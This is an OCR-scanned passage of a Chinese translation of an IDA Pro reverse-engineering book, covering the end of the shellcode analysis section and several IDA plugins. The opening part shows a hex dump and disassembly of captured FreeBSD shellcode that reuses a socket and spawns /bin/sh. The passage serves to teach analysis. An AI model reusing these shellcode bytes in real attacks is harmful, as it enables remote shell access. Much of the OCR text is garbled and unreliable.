00000050 D2 75 06 6A 01 58 50 CD 80 33 CO B4 10 2B EO 31  .u.j.XP..3...*.1 
00000060 D2 52 89 E6 52 52 B2 80 52 B2 04 52 56 52 52 66  .R..RR..R..RVRRf 


396 R2% 漏洞 分 析 
00000070 FF 46 E8 6A 1D 58 CD 80 81 3E 48 41 43 4B 75EF .F.j.X. . .»HACKu. 
00000080 5A 5F 6A 02 59 6A 5A 58 99 51 57 51 CD 80 49 79 Z j.YjZX.QWQ. Du 
00000090 F4 52 68 2F 2F 73 68 68 2F 62 69 6E 89 E3 50 54 .Rh//shh/bin..PT 
000000A0 53 53 BO 3B CD 80 41 41 49 47 41 93 97 97 4B 48 SS.;..AAIGA. . . KH 





很 明显 , 这 里 的 数据 既 包 含 ASCI 数据 ， 又 包含 二 进 制 数据 。 基 于 与 这 个 特殊 的 网 络 连 接 有 
关 的 其 他 数据 ， 我 们 认为 其 中 的 二 进 制 数据 为 shellcode。 通 常 ，Wireshark" 等 数据 包 分 析 工 具 能 
E TCP 会 话 内 容 直 接 提取 到 一 个 文件 中 。 在 使 用 Wireshark 时 ， 如 采 你 发 现 一 个 有 趣 的 TCP 
会 话 ， 你 可 以 使 用 Follow TCP Stream ( 跟踪 TCP 流 ) 命令 ， 并 将 原始 的 流 内 容 保 存 到 文件 中 。 
然后 ， 再 将 得 到 的 文件 加 载 到 IDA 中 (使 用 IDA 的 二 进 制 加载 器 )， 继 续 分 析 。 这 里 显示 的 内 容 
是 一 个 典型 的 网 络 攻击 ， 其 中 的 shelleode 与 应 用 程序 层 内 容 混杂 在 一 起 。 为 了 正确 反 汇 编 这 里 
的 shellcode, 你 必须 正确 定位 攻击 者 的 有 效 负 载 中 的 第 一 个 字 节 。 完成 这 个 任务 的 困难 程度 因 攻 
击 而 异 。 有 有 时候， 我 们 明显 可 以 看 到 长 长 的 “NOP 滑 道 ”( x86 攻击 中 长 长 的 0x90 序列 )， 而 在 
其 他 情况 下 (如 当前 的 例子 )， 定 位 NOP, shelleode 可 能 并 不 明显 。 例 如 ， 前 面 的 十 六 进 制 数据 
中 实际 上 就 包含 一 个 NOP 清道 ， 但 它 不 是 真正 的 x86 NOP 滑 道 ， 而 是 随机 生成 的 一 字 市 指令 序 
列 ， 这 些 指令 对 于 随后 使 用 的 shelleode 并 无 任何 影响 。 由 于 这 类 NOP 清道 拥有 无 穷 数 量 的 排列 
组 合 方式 ， 因 而 网 络 和 人 侵 检测 系统 几乎 很 难 识别 这 些 NOP 滑 道 并 就 此 发 出 敬告。 最后， 了 人 解 被 
攻击 的 应 用 程序 有 关 的 信息 ， 可 以 帮助 你 区 分 应 用 程序 使 用 的 数据 元 系 与 将 要 执行 的 shellcode。 
不 需要 付出 很 大 的 努力 ，IDA 即 可 将 前 面 的 二 进 制 内 容 反 汇编 成 下 面 的 代码 : 






































@ seg000:00000000 db oADh ; ij 
Seg000:00000001 db 2 
Seg000:00000002 db oFEh 
Seg000:00000003 db 8 
seg000: 00000004 db 1 
seg000: 00000005 db 0 
seg000:00000006 db 0 
seg000 : 00000007 db 0 
seg000:00000008 -= 
Seg000:00000008 inc edi 
seg000:00000009 inc ebx 
seg000:0000000A dec esi 
See ; NOP slide and shellcode initialization omitted 
seg000: 0000006D push edx 
seg000:0000006E push edx 
seg000:0000006F 
seg000:0000006F loc 6F: ; CODE XREF: seg000:0000007E Y j 
Seg000:0000006F inc word ptr [esi-18h] 
seg000:00000073 push 1Dh 
seg000: 00000075 pop eax 

O  seg000:00000076 int 80h ; LINUX - sys pause 
seg000 : 00000078 cmp dword ptr [esi], 4B434148h 
seg000:0000007E jnz short loc 6F 


D 参见 http://www.wireshark.org/。 
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Seg000:00000080 pop edx 
Seg000:00000081 pop edi 
seg000: 00000082 push 2 
seg000:00000084 pop ecx 
seg000:00000085 
seg000:00000085 loc 85: ; CODE XREF: seg000:0000008F Y j 
Seg000:00000085 push 5Ah ; 'Z' 
seg000:00000087 pop eax 
seg000 : 00000088 cdq 
seg000 : 00000089 push ecx 
seg000:0000008A push edi 
seg000:0000008B push eCX 
seg000:0000008C int 80h ; LINUX - old mmap 
seg000:0000008E dec ecx 
seg000:0000008F jns short loc 85 
seg000:00000091 push edx 
Seg000:00000092 push hs//' 
Seg000: 00000097 push nib/' 


; continues to invoke execve to spawn the shell 











值得 注意 的 是 ， 该 数据 流 中 的 前 SES (9) 实际 上 是 协议 数据 ， 而 不 是 shellcode， 因 此 
我 们 选择 不 对 它们 进行 反 汇 编 。 而 且 ，IDA 似乎 错误 地 标识 了 @ 处 和 @ 人 处 的 系统 调用 。 我 们 忽略 
了 一 个 事实 ， 即 此 入 侵 程 序 针 对 的 是 FreeBSD 应 用 程序 ， 这 将 有 助 于 对 有 效 负 载 中 使 用 的 系统 
调用 编写 进行 解码 。 由 于 IDA 只 能 为 Linux 系统 调用 编号 提供 注释 ， 因此, 我们 需要 进行 一 些 人 研 
究 才 能 得 知 : FreeBSD 系统 调用 29 ( 1dh ) 实际 为 recvfrom ( 而 非 pause )， 系 统 调 用 90 ( SAh ) 
实际 为 dup2 PRX. C 而 非 o1d_mmap )。 

通常 ， 由 于 shellcode 中 缺乏 对 IDA 有 用 的 头 部 信息 ， 因 此 ， 要 想 正 确 反 汇编 shellcode， 你 
必须 特别 仔细 。 此 外 ，shellcode 编写 者 经 常 使 用 shellcode 编码 器 来 避 开 入 侵 检 测 系统 。 这 类 编 
码 需 的 作用 与 对 标准 二 进 制 文件 使 用 的 模糊 工具 非常 类 似 ， 这 进一步 增加 了 反 汇 编 shellcode 的 
难度 。 











22.5 


WE, IDA 并 不 是 一 种 “万 能 ”解决 方案 ， Bee X bm] vip Wi] s SURE) 
终 目 标 是 只 使 用 IDA 执行 漏洞 分 析 ， 那 么 尽 可 能 最 大 限度 地 使 分 析 过 程 目 动 化 ， 将 不 失 为 一 种 
明智 之 举 。 当 开发 用 于 分 析 二 进 制 文件 的 算法 时 ， 你 应 该 始终 考虑 如 何 使 这 些 算 法 自动 化 ,以 在 
将 来 的 分 析 过 程 中 证 省 时 间 。 最 后 ,要 明 折 一点， 无论 阅读 多 少 最 住 图书 , 你 都 不 可 能 精通 漏洞 
分 析 与 破解 程序 开发 。 如 果 你 希望 培养 日 己 的 技能 ， 实践 是 唯一 的 途径 。 有 大 量 的 站 点 提供 了 培 
养 这 种 技能 的 实践 。Wargames ( http://www.overthewise.org/wargames/ ) 就 是 一 个 不 错 的 起 点 。 


小 结 




















实用 IDA 插件 











Ur. IDA 有 了 各 种 各 样 的 用 途 , [Hic BE, ANANN IDA 开发 出 大 量 插件 
ML oom. 从 而 也 满足 目 己 的 特殊 需求 。 如 果 你 想 利 用 其 他 人 的 劳动 成 果 ， 就 
应 知道 ， 关 于 公开 发 布 的 插件 ， 并 没有 所 谓 的 “一 站 式 服 务 ”"。 你 主要 可 以 在 3 个 地 方 找到 相关 
插件 : Hex-Rays 下 载 页 面 "、OpenRCE 下 载 页 面 ? 以 及 RCE 逆向 工程 论坛 ” 。 当 然 ， 花 一 些 时 间 
搜索 Google 可 能 会 有 意 想 不 到 的 收获 。 

和 任何 其 他 公开 发 布 的 软件 一 样 , 在 安装 第 三 方 插件 时 ， 你 可 能 会 面临 一 些 挑战 。 如 果 插 件 
开发 者 决定 公布 其 劳动 成 果 , 那么 他 会 以 源 代码 、 编 译 二 进 制 文件 或 同时 以 这 两 种 形式 发 布 插件 。 
如 果 必 须 由 源 代码 构建 插件 ， 你 必须 处 理由 插件 作者 提供 的 生成 文件 (或 同等 的 其 他 文件 )， 这 
个 文件 可 能 适合 、 也 可 能 不 适合 你 的 编译 需 配 置 。 另 一 方面 ， 如 果树 件 以 二 进 制 格式 发 布 ， 它 可 
能 使 用 与 你 的 IDA 版 本 不 兼容 的 SDK 版 本 构建 ,这 意味 着 在 插件 作者 发 布 一 个 更 新 的 版 本 之 前 ， 
你 根本 不 能 运行 这 个 插件 。 最后， 要 构建 、 运 行 (或 构建 和 运行 ) 插件 ,你 可 能 需要 满足 一 些 外 
部 依赖 关系 。 

本 章 将 介绍 几 种 常用 的 IDA 插件 ， 介 绍 它 们 的 作用 、 获 取 方 法 以 及 如 何 构 建 、 安 装 和 使 用 
它们 。 























23.1 Hex-Rays 


Hex-Rays 可 能 是 所 有 IDA 搬 件 的 “始祖 ”， 它 是 一 个 反 编 译 需 插件， 能 够 为 已 编译 的 ARM 
或 者 32 位 x86 二 进 制 文件 中 的 函数 生成 “类 似 C 语 言 的 伪 代 码 ””。Hex-Rays 是 一 个 商业 插件 ， 
由 开发 IDA 的 公司 创建 和 销售 。 这 个 反 编 译 磊 只 能 在 32 位 版 本 的 IDA. 上 使 用 。Hex-Rays 仅 以 二 
进 制 格式 发 布 , 要 安装 这 个 插件 ， 只 需 将 提供 的 插件 文件 复制 到 <IDADIR>/plugins 目录 即 可 。 用 
户 可 以 在 线 下 载 一 个 有 关 Hex-Rays 用 法 的 手册 ， 该 手册 提供 Hex-Rays 用 法 的 详细 概要 ， 并 且 











D 参见 http://www.hex-rays.com/idapro/idadown.htm。 
(2) 参见 http:/www.openrce.org/downloads/。 

(3) 参见 http://www.woodmann.com/forumy/index.php。 
(4) 参见 http://www.hex-rays.com/decompiler.shtml。 
© 参见 http://www.hex-rays.com/manual/., 
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包含 了 一 些 用 于 创建 反 编 译 需 搬 件 的 Hex-Rays SDK 的 文档 。 

安装 完毕 后 , 你 可 以 通过 View > Open Subviews > Pseudocode ( 热 键 F5 ) 激活 这 个 反 编 译 顺 ， 
反 编 译 包含 光标 的 困 数 ， 或 者 使 用 File » Produce File » Create C File ( £f CTRL+FS ) 反 编 译 数 
据 库 中 的 所 有 文件 ， 并 将 它们 保存 到 一 个 文件 中 。 

为 一 个 函数 生成 伪 代 码 时 ，IDA 将 打开 一 个 新 的 包含 反 编 译 函 数 的 子 视图 ( 标签 式 和 窗口 )。 
代码 清单 23-1 显示 了 一 个 伪 代 人 码 实 例 ， 它 使 用 Hex-Rays 生成 ， 用 于 查看 “Defcon 15 FER” ut 
制 文件 。 每 次 你 为 革 个 函数 生成 伪 代 码 ，Hex-Ravys 都 会 打开 一 个 新 的 选项 卡 式 窗口 来 显示 结果 。 








代码 清单 23-1 Hex-Kays 输出 示例 
signed int — cdecl sub 80489B4(int fd) 
d 
int v1; // eax@1 
signed int v2; // edx@1 
char buf; // [sp+4h] [bp-208h]82 
char s; // [sp+104h] [bp-108h]82 


v1 = sub 8048B44(fd, (int)"Hans Brix? Oh no! Oh, herro. Great to see you again, Hans! ", 0); 
v2 - -1j 
if ( v1 != -1) 


recv(fd, 8buf, Ox100u, 0); 

snprintf(&8s, Ox12Cu, "Hans Brix says: \"%s\"\n", &buf); 
sub 8048B44(fd, (int)8s, 0); 

V2 = 0; 


} 


return v2; 


} 

注意 ， 虽 然 Hex-Rays 对 参数 (al、a? S) 和 局 部 变量 ( v1 和 v2 ) 使 用 的 哑 命 名 约定 与 IDA 
中 使 用 的 约定 略 有 不 同 , 但 是 它们 区 分 函数 参数 与 局 部 变量 的 能 力 相同 。 如果 你 更 改 了 反 汇 编 代 
码 清 单 中 变量 的 名 称 ， 那 么 Hex-Rays 反 编译 全 ( 参见 表 23-1) 将 使 用 这 些 名 称 ， 而 不 是 内 部 生 
成 的 哑 名 。 











表 23-1 Hex-Rays 反 编 译 器 


名 称 Hex-Rays 反 编 译 需 

作者 llfak Guilfanov、 Hex-Rays.com 

发 布 仅 二 进 制 

价格 2239 美元 

描述 由 编译 的 ARM 或 32 位 x86 函数 生成 类 似 C 语言 的 伪 代 码 
信息 http://www.hex-rays.com/decompiler.shtml 


CD 参见 http:/www.hexblog.com/?p=107。 请 不 要 将 它 与 IDA SDK 相 混 消 。 





400 ”第 23 章 实用 IDA 播 件 


Hex-Rays 利用 IDA 采用 的 线索 来 推断 数据 类 型 。 但 是 ， 如 果 用 在 某 个 操作 中 的 数据 类 型 不 
符合 Hex-Rays 的 期 待 ， 你 会 注意 到 ， 为 了 强制 进行 类 型 转换 ， 可 能 会 有 更 多 的 类 型 转换 发 生 。 
为 了 方便 ， 你 可 以 通过 单 击 右键 并 选择 Hide Casts XAW, kK Hex-Rays 隐藏 所 有 类 型 转换 。 

打开 伪 代 码 窗 口 后 ,你 就 可 以 将 它 作为 源 代 人 码 编辑 器 和 导航 器 使 用 。 在 伪 代 码 窗 口中 进行 
航 和 编辑 ， 与 在 标准 的 IDA 反 汇 编 窗 口中 进行 导航 和 编辑 非常 相似 。 例 如 ， 双 击 某 个 函数 名 称 ， 
将 立即 在 伪 代 码 窗 口中 反 汇 编 该 函数 。 上 下 文 菜 单 提供 了 许多 编辑 功能 ( 如 图 23-1 所 示 )， 包 括 
更 改变 量 和 哨 数 名 称 及 其 类 型 。 











signed int v2; 
char buf- 
char s; Rename lvar 
Set Ivar type 
. Jump to xref... 
Edit lvar comment 


Mark as decompiled 


Copy to assembly 


Show casts s Brix says: 








图 23-1  Hex-Rays 反 汇 编 器 编辑 选项 


此 外 ， 你 对 变量 名 称 、 函 数 名 称 和 数据 类 型 所 作 的 更 改 将 传播 回 IDA 的 反 汇编 窗口 。 通 过 
重复 应 用 “ 重 命名 ”( Rename ) “设置 类 型 ”( Set Type ) 以 及 隐藏 转换 类 型 , 可 以 将 代码 清单 23-1 
轻松 转换 为 以 下 代码 。 


signed int _ cdecl sub 80489B4(int fd) 
d 
int length; // eax@1 
signed int error; // edx@1 
char buf[256]; // [sp+4h] [bp-208h]82 
char s[264]; // [sp+104h] [bp-108h]02 


length = write string(fd, "Hans Brix? Oh no! Oh, herro. Great to see you again, Hans! ", oi: 
error - -1; 
if ( length != -1 ) 


recv(fd, buf, 256u, 0); 

snprintf(s, 300u, "Hans Brix says: \"%s\"\n", buf); 
write string(fd, s, 0); 

error = 0; 


j 


return error; 


j 


请 记 住 ， 在 编译 过程 中 一 些 信息 会 丢失 。 同 时 也 没有 必要 为 任何 非 外 部 符号 保留 符号 信息 ， 
编 详 大 优化 会 删除 元 余 并 简化 代码 。 因 此 ， 除 上 自由 使 用 类 型 转换 外 ， 与 人 为 生成 的 C 代码 相 比 ， 
你 在 生成 的 伪 代 码 中 会 看 到 更 多 的 goto 语句 。 这 并 不 意外 ， 因 为 要 将 编 详 硕 生成 的 控制 流 完 全 
还 原 成 原始 的 C 请 言 格式 , 往往 会 非 第 困难 。 不过，Hex-Rays 能 够 识别 复杂 的 C 结构, 如 switch 
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语句 ， 并 付出 了 巨大 的 努力 来 识别 各 种 C 编译 器 使 用 的 标准 代码 序列 。 

鉴于 其 提供 的 各 种 功能 , 我 们 不 建议 你 过 于 依赖 Hex-Rays。 与 对 应 的 汇编 代码 相 比 ，C 源 代 
但 确实 更 具 可 谈 性 ， 也 更 加 简明 ， 但 反 编 译 并 不 完美 。 在 阅 谱 Hex-Rays 伪 代 人 码 的 过 程 中 ， 你 认 
为 目 己 看 到 的 是 基础 汇编 代码 的 可 信 表 示 形 式 , 同 时 JIlfak 也 尽 其 所 能 来 确保 Hex-Rays 的 准确 性 ， 
但 仍然 存在 一 些 特例 ,证 明 Hex-Rays 有 时 会 出 问题 。 因 此 ， 我 们 强烈 建议 你 对 照 基础 汇编 代码 
来 验证 你 通过 阅读 Hex-Rays 伪 代 码 得 出 的 任何 结论 。 最 后 ， 请 注意 ， 虽 然 Hex-Rays 可 用 于 处 理 
用 C++ 代码 编译 的 二 进 制 文件 ， 但 它 只 能 生成 C 代码 ， 并 且 生 成 的 代码 缺乏 任何 特定 于 C++ 代 
人 码 的 特性 。 




















23.2 |DAPython 





IDAPython ( 见 表 23-2 ) 是 一 个 由 Gergely Erdelyi 开发 的 第 三 方 IDA 插件 ， 我 们 已 在 第 15 
草 中 详细 介绍 了 该 插件 。 该 插件 受到 IDA 用 户 的 普遍 欢迎 。 自 IDA 5.4 以 来 , 所 有 IDA 版 本 均 以 
标准 插件 的 形式 自 带 了 IDAPython。 但 是 , IDAPython 仍然 是 一 个 开源 项 目 , 你 可 以 下 载 该 插件 ， 
对 其 进行 修改 ， 以 满足 自己 的 需要 。 

IDAPython 源 代 码 中 的 BUILDINGtxt 文件 提供 了 有 关 构 建 IDAPython 的 说 明 ，IDAPython 网 
站 则 提供 了 安装 该 插件 的 说 明 。 如 果 你 选择 从 源 代 码 构 建 IDAPython， 则 必须 满足 一 些 依 赖 条 件 。 
第 一 个 也 是 最 重要 的 条 件 是 ， 你 需要 安装 32 位 的 IDAPython。 我 们 建议 Windows 和 OS X FP fi 
用 Python 网 站 "上 提供 的 一 个 安装 程序 获取 并 安装 Python。 通 常 ,Linux 用 户 可 以 使 用 针对 其 Linux 
版 本 的 32 位 版 本 Python, 请 注意 ， 到 本 书 截稿 时 ， IDAPython EISE EE Python 版 本 3.x。 











SS 23-2 IDAPython 插件 


名 称 IDAPython 

作者 Gergely Erdelyi 

发 布 源 代 码 和 二 进 制 (IDA 也 自 带 二 进 制 版 本 ) 
价格 免费 

描述 用 于 IDA Pro 的 Python 脚本 引擎 

信息 http://code.google.com/p/idapython/ 


IDAPython 提供 的 Python 构建 脚本 (build.py ) 利用 简化 包装 器 接口 生成 器 (SWIG ) “生成 
连接 Python 与 IDA 的 C++ 库 所 需 的 组 件 ，IDA SDK ( 自 版 本 5.4 以 来 ) 自 带 的 头 文件 包含 许多 
为 确保 其 与 SWIG 兼容 的 宏 声 明 。 除 SWIG 外 , 构建 过 程 还 需要 C++ 编译 器 。Windows 环境 下 的 
构建 过 程 配置 使 用 微软 Visual C++2 ， 而 Linux 和 Mac 环境 下 的 构建 过 程 则 使 用 gtts 


D 参见 http://www.python.org/ o 
(2) 参见 http://www.swig.org/ ; 
(3) 欲 获得 Visual C++ 的 免费 精简 版 本 ， 访 问 http://www.microsoft.com/express/; 
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23.3 collabREate 


collabREate 插件 ( 如 表 23-3 所 示 ) Err — 3t il SCTERU - HEP ZLIRBIBUBME - 
collabREate 项 目的 目标 是 为 代表 间 步 客户 端的 插件 组 件 与 SQL 数据 库 支持 的 、 具 有 除 简 单数 据 
库 同步 以 外 的 支持 功能 的 强大 服务 带 组 件 提 供 日 然 集成 。 


SS 23-3 collabkEate 插件 








名 称 collabREate 

作者 Chris Eagle 和 Tim Vidas 

发 布 C++ 源 代码 和 二 进 制 ( 包括 IDA 人 免费 版 本 ) 
价格 免费 

TELS 提供 同步 远程 IDA 会 话 的 协作 框架 

信息 http://www.idabook.com/collabreate 


从 宏观 角度 看 ，collabREate 5 IDA Sync 项 目 " 非 常 相 似 。collabREate 插件 处 理 数 据 库 更 新 ， 
并 与 一 人 台 远 程 服务 需 组 件 通信 ， 从 而 与 其 他 项 目 成 员 同 步 数据 库 更 新 。 由 于 IDA 是 一 个 单线 程 
应 用 程序 ， 因 而 需要 某 种 用 于 处 理 异 步 非 阻塞 网 络 通信 的 机 制 。 在 6.0 之 前 的 IDA 版 本 中 ， 异步 
通信 组 件 派 生 自 IDA Sync 使 用 的 Windows 异步 套 接 字 技术 ,但 是 随 着 IDA 6.0 的 推出 ， 现 在 异 
步 通信 使 用 Qt 套 接 字 类 进行 处 理 ， 因 此 我 们 可 以 在 所 有 支持 IDA 的 平台 上 使 用 collabREate。 

collabREate 采用 一 种 集成 的 方法 ， 利 用 IDA 的 进程 和 IDB 事件 通知 机 制 来 捕获 用 户 操 作 。 
collabREate 通过 “ 钩 住 ” 各 种 数据 库 变 更 通知 ， 将 数据 库 更 新 无 颖 传播 到 collabREate HRS Ae, 
IDA 生成 的 变更 通知 的 类 型 和 数量 随 着 每 个 IDA. 版 本 的 发 布 而 不 断 增 长 ， 同 时 collabREate 设法 
为 其 所 构建 的 IDA 版 本 “ 钩 住 ” 尽 可 能 多 的 有 用 通知 。 使 用 collabREate 的 一 个 有 趣 的 “副作用 ” 
在 于 ， 它 人 允许 使 用 截然 不 同 的 IDA 版 本 (如 $.2 416.00 的 用 户 同 步 他 们 的 活动 ， 即 使 这 些 用 户 
无 法 彼此 交换 .idb 文件 。 ”collabREate 体系 结构 为 参与 的 用 户 提供 真正 的 发 布 和 订阅 功能 。 用 户 
可 以 选择 将 他 的 更 改 发 布 给 collabREate 服务 大 ， 或 订阅 提交 给 服务 大 的 更 改 ， 或 者 同时 发 布 和 
订阅 。 例 如 ， 一 名 有 经 验 的 用 户 可 能 希望 与 一 组 用 户 共 享 (发布 ) 他 的 更 改 ， 但 阻止 〈 不 订阅 ) 
其 他 用 户 作 出 的 所 有 更 改 。 用 户 可 以 选择 他 们 希望 发 布 和 订阅 的 操作 的 类 别 ， 如 字 市 值 更 改 、 名 
称 更 改 以 及 添加 或 删除 注释 。 例 如 ,一 名 用 户 可 能 仅仅 而 望 发 布 注释 ， 而 另 一 个 用 户 则 只 想 要 订 
阅 名 称 更 改 和 字 市 修补 通知 。 

collabREate 插件 最 重要 的 特性 之 一 在 于 它 与 IDA SDK 的 高 度 集成 。IDA 通知 与 特定 的 数据 
库 操 作 ( 而 非特 定 的 用 户 操作 ) 密切 相关 。 当 然 ， 如 采用 户 操作 触发 了 IDA 通知， 这 会 给 协作 
过 程 造成 重大 影响 。 但 是 , 通知 也 可 以 通过 其 他 方法 触发 。 脚本 和 API 函数 调用 也 可 以 生成 通知 
消息 。 因 此 ， 修补 数据 库 字 节 、 重 命名 位 置 或 变量 或 者 插入 新 注释 的 一 段 IDC 脚本 的 操作 ， 将 
发 布 到 collabREate 服务 器 ， 并 最 终 与 在 同一 个 项 目 上 工作 的 其 他 IDA 用 户 共 享 。 





















































D Æ http://pedram.redhive.com/code/ida-plugins/ida-sync/。 
DWH, 早期 IDA 版 本 无 法 打开 使 用 较 新 IDA 版 本 创建 的 .idb 文件 。 
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MW, collabREate 的 服务 器 组 件 在 Java 中 运行 ， 并 使 用 JDBC "与 后 端 SQL 数据 库 通信 。 该 
服务 需 负 责 用 户 和 项 目 管 理 。 用 户 账户 通过 服务 需 的 一 个 命令 行 界 面 进行 管理 ,而 项 目 则 申 连 接 
到 服务 顺 的 用 户 创 建 。 经 过 服务 需 的 验证 后 ， 用 户 的 collabREate 插件 将 癌 服务 需 发 送 用 户 分 析 
的 输入 文件 的 MD5 散 列 。 这 个 MDS 值 用 于 确保 多 名 用 户 实际 上 在 处 理 完 全 相同 的 输入 文件 。 XE 
Pills dae. 用 户 将 说 明 他 和 布 望 订阅 的 更 新 的 类 型 ， 这 时 ， 服 务 大 将 回 用 户 转 交 目 用 户 上 次 会 话 
以 来 它 缓存 的 所 有 更 新 。collabREate 的 “项 目 选择 ”对 话 框 如 图 23-2 所 示 。 














à Project Selection | 全 | xl 
Select a project to join: 
| «Mew praject- E | 
Description (Mew project only): 
[Test Praject 
Optons | Cancel | 





图 23-2 collabREate 的 “项 目 选择 ”对 话 框 


在 这 个 对 话 框 中 ， 用 户 将 看 到 一 个 与 当前 数据 库 兼 容 的 项 目下 拉 列 表 。 另 外 ,你 还 可 以 创建 
一 个 新 的 项 目 ， 需 要 用 户 输入 一 段 方便 其 他 用 户 查 看 的 项 目 说 明 。 

collabREate 服务 需 能 够 对 现 有 的 项 目 创建 分 文 ， 让 用 户 为 一 个 项 目 创建 备用 分 文 ， 而 不 致 于 
影响 到 其 他 用 户 。 如 果 你 想 要 对 一 个 数据 库 进 行 大 量 更 改 ( 并 追踪 这 些 更 改 ), 但 不 希望 迫使 其 他 
用 户 进 行 这 些 更 改 ， 就 可 以 用 到 这 个 特性 。 巾 于 服务 需 能 够 处 理 与 单个 二 进 制 输入 文件 有 关 的 多 
个 项 目 , collabREate 插件 和 服务 大 需要 采取 额外 的 步骤 ,以 确保 用 户 连 接 到 数据 库 中 的 正确 项 目 。 

collabREate 服务 珊 并 不 提供 回 滚 功能 ， 但 提供 某 种 形式 的 “保存 点 ”。 用 户 可 以 在 任何 时 候 
拍摄 一 张 快 照 ， 然 后 返回 到 这 个 数据 库 状 态 。 用 户 可 以 重新 打开 二 进 制 文件 〈 新 的 ,idb 文件 ), 
并 通过 这 个 快照 分 支 一 个 新 的 项 目 。 因 此 ， 用 户 可 以 返回 到 逆 问 过 程 中 的 一 个 特定 的 时 间 点 。 
collabREate 的 分 支 和 快照 功能 可 以 通过 最 初 激活 该 插件 所 使 用 的 相同 热 键 组 合 进行 访问 ,得 到 的 
对 话 框 如 图 23-3 所 示 。 



































Manage requested permissions 
Manage project permissions (owner only) 
Disconnect fram server 


Cancel | 





图 23-3 collabREate 的 “选择 命令 ”对 话 框 


collabREate 服务 俐 的 最 后 一 个 特性 , 在 于 它 可 以 限制 用 户 可 发 布 的 更 新 。 例如, 一 名 用 户 仅 
限于 订阅 更 新 ， 而 男 一 名 用 户 仪 仪 能 够 发 布 注释 ， 第 三 名 用 户 则 可 以 发 布 所 有 类 型 的 更 新 。 














(D JDBC 为 Java 数据 库 互 通 API。 
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23.4 ida-x86emu 


3i p] TUR E HEE TG Tel Wee no DAT BERRBUTTIUS. Dk. PERE T H 
你 所 分 析 的 指令 集 , 并 拥有 一 份 便捷 的 参考 资料 , DATES SITAS RESENS. 这 时 ， 
绰 令 模拟 需 是 一 个 有 用 的 工具 ， 可 以 帮助 你 跟踪 在 执行 一 系列 指令 的 过 程 中 ， 注 册 表 和 CPU 
状态 的 变化 情况 。 我 们 在 第 21 章 详细 讨论 的 ida-x86emu 插件 ( 如 表 23-4 所 示 ) 就 是 这 样 一 个 
模拟 需 。 

















SS 23-4 ida-x86emu 插件 





名 称 ida-x86emu 

作者 Chris Eagle 

发 布 源 代码 (适用 于 SDK v6) 和 二 进 制 (适用 于 IDA5.0 之 后 的 所 有 版 本 ， 包 括 IDA 免费 版 本 ) 。 源 
代码 格式 同 后 兼容 到 SDK 4.9 

价格 免费 

描述 IDA DIS A d x86 指令 模拟 器 

信息 http://www.idabook.com/ida-x86emu/ 


这 个 插件 以 源 代 码 的 方式 发 布 ， 并 且 与 IDASDK 4.6 及 更 高 版 本 兼容 。 同 时 ， 该 插件 还 自 带 
构建 脚本 和 项 目 文件 ， 以 便于 在 构建 过 程 中 使 用 Windows 平台 上 的 MinGW 工具 或 微软 Visual 
Studio 和 非 Windows 平台 上 的 g++。 该 插件 的 发 行 版 提供 一 个 供 IDA 人 免费 版 使 用 的 预 编译 二 进 制 
版 本 。ida-x86emu 能 够 与 所 有 基于 Qt 的 IDA 版 本 兼容 ,但 是 在 IDA 6.0 之 前 ， 该 插件 仅 与 IDA 
的 Windows GUI 版 本 兼容 。 

该 插件 在 开发 过 程 中 考虑 到 了 上 自修 改 代码 ， 它 从 当前 IDA 数据 库 中 读 取 指令 字 市 ， 解 码 这 
些 指令 并 执行 相关 的 操作 。 相 关 操 作 包 括 更 新 模拟 需 的 内 部 注册 变量 ， 遇 到 目 修 改 代 人 码 时 回 写 
( back write ) 数据 库 。 该 插件 通过 分 配 新 的 IDA 段 并 进行 适当 的 读 取 和 写 和 人 ， 执 行 一 个 模拟 的 堆 
和 栈 。 有 关 使 用 ida-x86emu 插件 的 详细 信息 ， 请 参阅 第 21 e, 














23.5 Class Informer 








如 第 8 莉 所 述 ，C++ 程 序 可 能 包括 有 助 于 你 发 现 类 名 称 和 类 层次 结构 的 信息 。 这 些 般 入 的 信 
息 旨 在 为 C++ 运行 时 类 型 识别 (RTT) 提供 支持 。 

Sirmabus 开发 的 C++ Class Informer 插件 主要 用 于 逆 癌 工程 使 用 Microsoft Visual Studio 编译 
的 CC. Class Informer 通过 标识 虚拟 函数 表 ( vtable 或 vftable) 及 RTTI 信 息 ， 然 后 提取 出 
相关 类 名 称 与 继承 信息 ,从 而 自动 完成 Igor Skochinsky 在 他 的 有 关 逆 向 工程 Microsoft Visual CH” 
的 OpenRCE 文 草 中 摘 述 的 大 部 分 工作 。 











(D 参见 http://www.openrce.org/articles/fullview/23。 


23.5 Class Informer 405 


X 23-5 Class Informer 


名 称 Class Informer 

作者 Sirmabus 

发 布 仅 二 进 制 格式 

价格 免费 

描述 MSVC C++ 类 识别 插件 

FE http://www.macromonkey.com/downloads/IDAPlugIns/Class Informer102.zip 


激活 后 ，Class Informer 将 显示 如 图 23-4 所 示 的 选项 对 话 框 ， 以 便于 用 户 规定 Class Informer 
应 在 二 进 制 文件 的 什么 位 置 扫描 vtableg， 并 人 允许 用 户 控制 Class Informer 输出 的 详细 程度 。 


à «Class Informer Plug-in | X] 
-Version: 1.02 , build Mar 28 2011 , by Sirmabus - 
Warning: You should save your IDB first before running this. 
COpntinng: 

[« Build type containers. 

[« Find, fix, and label static/global ctors and dtors， 
fw Report all vftables found. 

[ Overwrite anterior comments. 


[ verbose output to debug channel. 





[v Audio nati'ication on completion. 


Choose CODE segments | Choose RDATA segments | 
Open support forum | 





K| 23-4 Class Informer 选项 对 话 框 


用 户 单 击 “Continue”( 继续 ) 按钮 后 ，Class Informer 将 开始 扫描 ， 扫 描 过 程 可 能 要 花费 一 
段 时 间 ， 具 体 取决 于 二 进 制 文件 的 大 小 以 及 Class Informer 遇 到 的 虚拟 函数 表 的 数量 。 扫 描 完 成 
后 ，Class Informer 将 在 IDA 中 打开 一 个 新 的 选项 卡 式 窗口 以 汇总 扫描 结果 。Class Informer 输出 
的 部 分 代码 清单 如 下 所 示 : 


@ Vftable @Method count Class & structure info 





0041A298 0003 ChildClass; [MI] 

0041A2A8 0003 ChildClass: SuperClassi, SuperClass2; [MI] 
0041A2B8 0003 SuperClassi; [SI] 

0041A2C8 0003 SuperClass2; [SI] 

0041A2D8 0004 BaseClass; [SI] 


0041A2EC 0005 SubClass: BaseClass; [SI] 
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对 于 发 现 的 每 个 虚拟 函数 表 ，Class Informer 将 显示 vtable 的 地 址 (@ )、 方 法 计数 (@， 等 
于 vtable 中 所 包含 的 函数 指针 的 数量 )， 以 及 有 关 由 骸 入 的 RTTI 信息 得 到 的 每 个 类 的 摘要 信息 
